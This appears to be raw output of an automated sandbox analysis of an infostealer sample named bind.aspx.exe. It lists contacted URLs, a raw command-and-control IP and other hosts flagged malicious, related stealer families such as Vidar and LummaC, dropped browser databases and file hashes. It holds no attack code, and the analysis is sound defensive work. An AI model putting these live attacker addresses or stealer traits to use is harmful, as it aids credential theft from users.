https://store.steampowered.com/steam_refunds/ | bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.dr | false | URL Reputation: safe | unknown
https://t.me/iyigunlhellosqlr.dllsqlite3.dllIn | bind.aspx.exe | false |  | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | BKKFHI.4.dr | false | URL Reputation: safe | unknown
https://steamcommunity.com/workshop/ | bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.dr | false |  | unknown
https://login.steampowered.com/ | bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://store.steampowered.com/legal/ | bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.dr | false | URL Reputation: safe | unknown
https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=e | bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.dr | false | URL Reputation: safe | unknown
http://www.sqlite.org/copyright.html. | bind.aspx.exe | false | URL Reputation: safe | unknown
https://135.181.31.18/_n | bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp | false |  | unknown
https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv | bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.dr | false | URL Reputation: safe | unknown
https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=engl | 76561199761128941[1].htm.4.dr | false | URL Reputation: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | BKKFHI.4.dr | false |  | unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252. | bind.aspx.exe, 00000004.00000002.1880614542.00000000036F8000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.00000000035EB000.00000004.00000020.00020000.00000000.sdmp, FBFIJJ.4.dr | false |  | unknown
https://135.181.31.18/-n | bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp | false |  | unknown
[IP frequency chart legend: No. of IPs < 25%; 25% < No. of IPs < 50%; 50% < No. of IPs < 75%; 75% < No. of IPs]

IP | Domain | Country | ASN | ASN Name | Malicious
95.164.119.162 | stadiatechnologies.com | Gibraltar | 39762 | VAKPoltavaUkraineUA | true
104.102.49.254 | steamcommunity.com | United States | 16625 | AKAMAI-ASUS | true
135.181.31.18 | unknown | Germany | 24940 | HETZNER-ASDE | true
                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                      Analysis ID:1521042
                                                                                                                      Start date and time:2024-09-28 03:28:07 +02:00
                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                      Overall analysis duration:0h 6m 19s
                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                      Report type:full
                                                                                                                      Cookbook file name:default.jbs
                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                      Number of analysed new started processes analysed:19
                                                                                                                      Number of new started drivers analysed:0
                                                                                                                      Number of existing processes analysed:0
                                                                                                                      Number of existing drivers analysed:0
                                                                                                                      Number of injected processes analysed:0
                                                                                                                      Technologies:
                                                                                                                      • HCA enabled
                                                                                                                      • EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: bind.aspx.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@6/17@2/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 96
• Number of non-executed functions: 75
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: bind.aspx.exe
Time | Type | Description
23:01:45 | API Interceptor | 1x Sleep call for process: bind.aspx.exe modified
Match (IP) | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
95.164.119.162 | Unlock_Tool_5.0.exe | Get hash | malicious | PureLog Stealer, Vidar | Browse | stadiatechnologies.com/
95.164.119.162 | 81bl0ZlcJ3.exe | Get hash | malicious | LummaC, Stealc, Vidar | Browse | stadiatechnologies.com/
95.164.119.162 | ejH1Ma9DnJ.exe | Get hash | malicious | LummaC, Vidar | Browse | stadiatechnologies.com/
95.164.119.162 | xnfvsO7kVN.exe | Get hash | malicious | LummaC, Vidar | Browse | stadiatechnologies.com/
95.164.119.162 | file.exe | Get hash | malicious | LummaC, PureLog Stealer, Vidar | Browse | stadiatechnologies.com/
95.164.119.162 | file.exe | Get hash | malicious | LummaC, PureLog Stealer, Stealc, Vidar | Browse | stadiatechnologies.com/
95.164.119.162 | file.exe | Get hash | malicious | LummaC, PureLog Stealer, Vidar | Browse | stadiatechnologies.com/
95.164.119.162 | kqS23MOytx.exe | Get hash | malicious | Socks5Systemz, Stealc, Vidar, XWorm, Xmrig | Browse | stadiatechnologies.com/
95.164.119.162 | file.exe | Get hash | malicious | LummaC, Vidar | Browse | stadiatechnologies.com/
95.164.119.162 | file.exe | Get hash | malicious | LummaC, Vidar | Browse | stadiatechnologies.com/
104.102.49.254 | https://steamcommninty.com/activates/gifts | Get hash | malicious | Unknown | Browse |
104.102.49.254 | file.exe | Get hash | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar | Browse |
104.102.49.254 | file.exe | Get hash | malicious | LummaC | Browse |
104.102.49.254 | kewyIO69TI.exe | Get hash | malicious | LummaC | Browse |
104.102.49.254 | gZzI6gTYn4.exe | Get hash | malicious | LummaC | Browse |
104.102.49.254 | U6b3tLFqN5.exe | Get hash | malicious | LummaC | Browse |
104.102.49.254 | zlsXub68El.exe | Get hash | malicious | Vidar | Browse |
104.102.49.254 | 0UB3FIL25c.exe | Get hash | malicious | LummaC | Browse |
104.102.49.254 | file.exe | Get hash | malicious | LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Socks5Systemz | Browse |
104.102.49.254 | file.exe | Get hash | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar | Browse |
135.181.31.18 | SecuriteInfo.com.Trojan.PWS.Steam.37582.19133.23112.exe | Get hash | malicious | Vidar | Browse |
Match (Domain) | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
steamcommunity.com | https://steamcommninty.com/activates/gifts | Get hash | malicious | Unknown | Browse | 104.102.49.254
steamcommunity.com | file.exe | Get hash | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar | Browse | 104.102.49.254
steamcommunity.com | file.exe | Get hash | malicious | LummaC | Browse | 104.102.49.254
steamcommunity.com | kewyIO69TI.exe | Get hash | malicious | LummaC | Browse | 104.102.49.254
steamcommunity.com | gZzI6gTYn4.exe | Get hash | malicious | LummaC | Browse | 104.102.49.254
steamcommunity.com | U6b3tLFqN5.exe | Get hash | malicious | LummaC | Browse | 104.102.49.254
steamcommunity.com | zlsXub68El.exe | Get hash | malicious | Vidar | Browse | 104.102.49.254
steamcommunity.com | 0UB3FIL25c.exe | Get hash | malicious | LummaC | Browse | 104.102.49.254
steamcommunity.com | file.exe | Get hash | malicious | LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Socks5Systemz | Browse | 104.102.49.254
steamcommunity.com | file.exe | Get hash | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar | Browse | 104.102.49.254
stadiatechnologies.com | SecuriteInfo.com.Trojan.PWS.Steam.37582.19133.23112.exe | Get hash | malicious | Vidar | Browse | 95.164.119.162
stadiatechnologies.com | Unlock_Tool_5.0.exe | Get hash | malicious | PureLog Stealer, Vidar | Browse | 95.164.119.162
stadiatechnologies.com | 81bl0ZlcJ3.exe | Get hash | malicious | LummaC, Stealc, Vidar | Browse | 95.164.119.162
stadiatechnologies.com | ejH1Ma9DnJ.exe | Get hash | malicious | LummaC, Vidar | Browse | 95.164.119.162
stadiatechnologies.com | xnfvsO7kVN.exe | Get hash | malicious | LummaC, Vidar | Browse | 95.164.119.162
stadiatechnologies.com | 1p5yg5LO0h.exe | Get hash | malicious | Vidar | Browse | 95.164.119.162
stadiatechnologies.com | file.exe | Get hash | malicious | LummaC, PureLog Stealer, Vidar | Browse | 95.164.119.162
stadiatechnologies.com | file.exe | Get hash | malicious | LummaC, PureLog Stealer, Stealc, Vidar | Browse | 95.164.119.162
stadiatechnologies.com | file.exe | Get hash | malicious | LummaC, PureLog Stealer, Vidar | Browse | 95.164.119.162
stadiatechnologies.com | gHPYUEh253.exe | Get hash | malicious | Djvu, Neoreklami, Stealc, Vidar, Xmrig | Browse | 95.164.119.162
Match (ASN) | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
VAKPoltavaUkraineUA | SecuriteInfo.com.Trojan.PWS.Steam.37582.19133.23112.exe | Get hash | malicious | Vidar | Browse | 95.164.119.162
VAKPoltavaUkraineUA | Unlock_Tool_5.0.exe | Get hash | malicious | PureLog Stealer, Vidar | Browse | 95.164.119.162
VAKPoltavaUkraineUA | 81bl0ZlcJ3.exe | Get hash | malicious | LummaC, Stealc, Vidar | Browse | 95.164.119.162
VAKPoltavaUkraineUA | ejH1Ma9DnJ.exe | Get hash | malicious | LummaC, Vidar | Browse | 95.164.119.162
VAKPoltavaUkraineUA | xnfvsO7kVN.exe | Get hash | malicious | LummaC, Vidar | Browse | 95.164.119.162
VAKPoltavaUkraineUA | 1p5yg5LO0h.exe | Get hash | malicious | Vidar | Browse | 95.164.119.162
VAKPoltavaUkraineUA | file.exe | Get hash | malicious | LummaC, PureLog Stealer, Vidar | Browse | 95.164.119.162
VAKPoltavaUkraineUA | file.exe | Get hash | malicious | LummaC, PureLog Stealer, Stealc, Vidar | Browse | 95.164.119.162
VAKPoltavaUkraineUA | file.exe | Get hash | malicious | LummaC, PureLog Stealer, Vidar | Browse | 95.164.119.162
VAKPoltavaUkraineUA | kqS23MOytx.exe | Get hash | malicious | Socks5Systemz, Stealc, Vidar, XWorm, Xmrig | Browse | 95.164.119.162
HETZNER-ASDE | http://1d807473.flca.pages.dev/ | Get hash | malicious | TechSupportScam | Browse | 195.201.57.90
HETZNER-ASDE | http://cdn.prod.website-files.com:80/65f02675f8a97005cc28dca1/66cf319e76a975faf0a504d6_10698624705.pdf | Get hash | malicious | Unknown | Browse | 49.12.202.237
HETZNER-ASDE | file.exe | Get hash | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar | Browse | 5.75.211.162
HETZNER-ASDE | ATT71725.html | Get hash | malicious | HTMLPhisher | Browse | 135.181.18.187
HETZNER-ASDE | zlsXub68El.exe | Get hash | malicious | Vidar | Browse | 5.75.211.162
HETZNER-ASDE | http://tokenpuzz1le.com/ | Get hash | malicious | HTMLPhisher | Browse | 88.198.5.198
HETZNER-ASDE | https://dailycontestportal.live/africa/cm/orange-reward-survey-1/fr-1.php/ | Get hash | malicious | Unknown | Browse | 178.63.248.57
HETZNER-ASDE | https://tokenp0kczt.net/ | Get hash | malicious | HTMLPhisher | Browse | 88.198.5.198
HETZNER-ASDE | http://tokenpblket.com/ | Get hash | malicious | HTMLPhisher | Browse | 88.198.5.198
HETZNER-ASDE | https://f0mlxe0jneh1.pages.dev/ | Get hash | malicious | Unknown | Browse | 195.201.57.90
AKAMAI-ASUS | https://steamcommninty.com/activates/gifts | Get hash | malicious | Unknown | Browse | 104.102.49.254
AKAMAI-ASUS | file.exe | Get hash | malicious | Amadey, Stealc, Vidar | Browse | 23.57.90.145
AKAMAI-ASUS | Macabacus-9.7.2.msi | Get hash | malicious | Unknown | Browse | 184.28.90.27
AKAMAI-ASUS | https://www.dropbox.com/scl/fi/4fnryjjmfp8le01uyciyl/IASSecurity.paper?rlkey=4ezd7413h2y3rkfjifz9e7enl&st=6sa33sex&dl=0 | Get hash | malicious | HTMLPhisher | Browse | 104.102.43.106
AKAMAI-ASUS | 042258835-17458857786.docx | Get hash | malicious | HTMLPhisher | Browse | 184.28.90.27
AKAMAI-ASUS | file.exe | Get hash | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar | Browse | 104.102.49.254
AKAMAI-ASUS | https://img1.wsimg.com/blobby/go/0fb15fac-f667-4c74-8a1e-27661514d143/downloads/87458256888.pdf | Get hash | malicious | Unknown | Browse | 23.195.92.153
AKAMAI-ASUS | https://www.pineapplehospitality.net/ | Get hash | malicious | Unknown | Browse | 104.102.19.45
AKAMAI-ASUS | SecuriteInfo.com.Program.RemoteAdminNET.1.367.20003.msi | Get hash | malicious | AteraAgent | Browse | 2.19.126.163
AKAMAI-ASUS | Electronic Receipt for Carolann Campbell.pdf | Get hash | malicious | HTMLPhisher | Browse | 104.78.188.188
Match (JA3 Fingerprint) | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
51c64c77e60f3980eea90869b68c58a8 | file.exe | Get hash | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar | Browse | 135.181.31.18
51c64c77e60f3980eea90869b68c58a8 | zlsXub68El.exe | Get hash | malicious | Vidar | Browse | 135.181.31.18
51c64c77e60f3980eea90869b68c58a8 | file.exe | Get hash | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar | Browse | 135.181.31.18
51c64c77e60f3980eea90869b68c58a8 | file.exe | Get hash | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar | Browse | 135.181.31.18
51c64c77e60f3980eea90869b68c58a8 | file.exe | Get hash | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar | Browse | 135.181.31.18
51c64c77e60f3980eea90869b68c58a8 | file.exe | Get hash | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar | Browse | 135.181.31.18
51c64c77e60f3980eea90869b68c58a8 | file.exe | Get hash | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar | Browse | 135.181.31.18
51c64c77e60f3980eea90869b68c58a8 | file.exe | Get hash | malicious | LummaC, Vidar | Browse | 135.181.31.18
51c64c77e60f3980eea90869b68c58a8 | file.exe | Get hash | malicious | LummaC, Vidar | Browse | 135.181.31.18
51c64c77e60f3980eea90869b68c58a8 | file.exe | Get hash | malicious | Vidar | Browse | 135.181.31.18
37f463bf4616ecd445d4a1937da06e19 | useraccount.aspx.dll | Get hash | malicious | Matanbuchus | Browse | 104.102.49.254
37f463bf4616ecd445d4a1937da06e19 | file.exe | Get hash | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar | Browse | 104.102.49.254
37f463bf4616ecd445d4a1937da06e19 | file.exe | Get hash | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar | Browse | 104.102.49.254
37f463bf4616ecd445d4a1937da06e19 | file.exe | Get hash | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar | Browse | 104.102.49.254
37f463bf4616ecd445d4a1937da06e19 | file.exe | Get hash | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar | Browse | 104.102.49.254
37f463bf4616ecd445d4a1937da06e19 | SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe | Get hash | malicious | GuLoader | Browse | 104.102.49.254
37f463bf4616ecd445d4a1937da06e19 | Cortex.exe | Get hash | malicious | Unknown | Browse | 104.102.49.254
37f463bf4616ecd445d4a1937da06e19 | Cortex.exe | Get hash | malicious | Unknown | Browse | 104.102.49.254
37f463bf4616ecd445d4a1937da06e19 | file.exe | Get hash | malicious | CredGrabber, Meduza Stealer | Browse | 104.102.49.254
37f463bf4616ecd445d4a1937da06e19 | file.exe | Get hash | malicious | CredGrabber, Meduza Stealer | Browse | 104.102.49.254
Match | Associated Sample Name / URL | Detection | Threat Name
C:\ProgramData\GCAEHDBAAECB\freebl3.dll | file.exe | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar
C:\ProgramData\GCAEHDBAAECB\freebl3.dll | file.exe | malicious | Amadey, Stealc, Vidar
C:\ProgramData\GCAEHDBAAECB\freebl3.dll | file.exe | malicious | Amadey, Stealc, Vidar
C:\ProgramData\GCAEHDBAAECB\freebl3.dll | file.exe | malicious | Stealc, Vidar
C:\ProgramData\GCAEHDBAAECB\freebl3.dll | file.exe | malicious | Amadey, Stealc, Vidar
C:\ProgramData\GCAEHDBAAECB\freebl3.dll | file.exe | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar
C:\ProgramData\GCAEHDBAAECB\freebl3.dll | file.exe | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar
C:\ProgramData\GCAEHDBAAECB\freebl3.dll | file.exe | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar
C:\ProgramData\GCAEHDBAAECB\freebl3.dll | file.exe | malicious | Stealc, Vidar
C:\ProgramData\GCAEHDBAAECB\freebl3.dll | file.exe | malicious | Stealc, Vidar
C:\ProgramData\GCAEHDBAAECB\mozglue.dll | file.exe | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar
C:\ProgramData\GCAEHDBAAECB\mozglue.dll | file.exe | malicious | Amadey, Stealc, Vidar
C:\ProgramData\GCAEHDBAAECB\mozglue.dll | file.exe | malicious | Amadey, Stealc, Vidar
C:\ProgramData\GCAEHDBAAECB\mozglue.dll | file.exe | malicious | Stealc, Vidar
C:\ProgramData\GCAEHDBAAECB\mozglue.dll | file.exe | malicious | Amadey, Stealc, Vidar
C:\ProgramData\GCAEHDBAAECB\mozglue.dll | file.exe | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar
C:\ProgramData\GCAEHDBAAECB\mozglue.dll | file.exe | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar
C:\ProgramData\GCAEHDBAAECB\mozglue.dll | file.exe | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar
C:\ProgramData\GCAEHDBAAECB\mozglue.dll | file.exe | malicious | Stealc, Vidar
C:\ProgramData\GCAEHDBAAECB\mozglue.dll | file.exe | malicious | Stealc, Vidar

Process: C:\Users\user\Desktop\bind.aspx.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category: dropped
Size (bytes): 106496
Entropy (8bit): 1.137181696973627
Encrypted: false
SSDEEP: 192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
MD5: 2D903A087A0C793BDB82F6426B1E8EFB
SHA1: E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
SHA-256: AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
SHA-512: 90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
Malicious: false
Reputation: moderate, very likely benign file
                                                                                                                                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Users\user\Desktop\bind.aspx.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
Category: dropped
Size (bytes): 20480
Entropy (8bit): 0.848598812124929
Encrypted: false
SSDEEP: 24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
MD5: 9664DAA86F8917816B588C715D97BE07
SHA1: FAD9771763CD861ED8F3A57004C4B371422B7761
SHA-256: 8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
SHA-512: E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
Malicious: false
Reputation: moderate, very likely benign file
                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Users\user\Desktop\bind.aspx.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category: dropped
Size (bytes): 51200
Entropy (8bit): 0.8746135976761988
Encrypted: false
SSDEEP: 96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5: 9E68EA772705B5EC0C83C2A97BB26324
SHA1: 243128040256A9112CEAC269D56AD6B21061FF80
SHA-256: 17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512: 312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious: false
Reputation: high, very likely benign file
                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Users\user\Desktop\bind.aspx.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category: dropped
Size (bytes): 40960
Entropy (8bit): 0.8553638852307782
Encrypted: false
SSDEEP: 48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5: 28222628A3465C5F0D4B28F70F97F482
SHA1: 1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256: 93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512: C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious: false
                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Users\user\Desktop\bind.aspx.exe
File Type: ASCII text, with very long lines (1769), with CRLF line terminators
Category: dropped
Size (bytes): 9370
Entropy (8bit): 5.514140640374404
Encrypted: false
SSDEEP: 192:lLnSRkPYbBp6tqUCaXr6V6kHNBw8D3nSl:NeqqUWpPwK0
MD5: 7E44458E0A8A3A7D10875BC3B7AE72D1
SHA1: E5E6AC8676EE3761DAB13A10EB7573C19F48D297
SHA-256: 21A04E176A9CEBDA60AE6FD82A7495C6E0867ED02B8009A44DDC9863E14D8753
SHA-512: 012ED6CDC0802AA1063EFE841549341CC86EB626A26FC4BDC509598D8E33093296510344A2CC4419B007F6191F3445DA8F0AAE3B1626E54C1EF66DDDF3FA59B1
Malicious: false
                                                                                                                                                                                    Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "27fb6245-bd08-4de6-8f4d-2ece3f597752");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696491690);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696491694);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

Process: C:\Users\user\Desktop\bind.aspx.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category: dropped
Size (bytes): 20480
Entropy (8bit): 0.6732424250451717
Encrypted: false
SSDEEP: 24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5: CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1: 3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256: EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512: 0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious: false
